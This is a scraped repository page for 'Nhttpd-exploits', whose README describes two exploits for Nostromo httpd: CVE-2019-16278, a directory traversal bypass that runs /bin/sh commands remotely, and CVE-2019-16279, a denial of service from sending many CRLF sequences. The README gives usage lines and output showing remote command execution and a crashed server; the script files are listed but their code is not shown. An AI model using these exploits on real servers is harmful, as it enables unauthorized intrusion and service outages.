sp0re
/
Nhttpd-exploits
Watch 1
Star 1
Fork 1
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
1 Commit
1 Branch
Branch: master
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from 'master'
${ noResults }
sp0re c24998744b First commit 1 month ago
CVE-2019-16278.sh First commit 1 month ago
CVE-2019-16279.sh First commit 1 month ago
README.md First commit 1 month ago

README.md

Exploits for CVE-2019-16278 and CVE-2019-16279

Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) first one is an RCE through directory transversal, second one is a DoS

CVE-2019-16278 - Directory transversal to remote code execution

This bug is due to an incomplete fix for CVE-2011-0751. We can bypass a check for /../ which allows us to execute /bin/sh with arbitrary arguments.

Example

$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)

CVE-2019-16279 - Denial of Service

This bug exploit a memory error when sending too many \r\n in a single connexion.

Example

$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused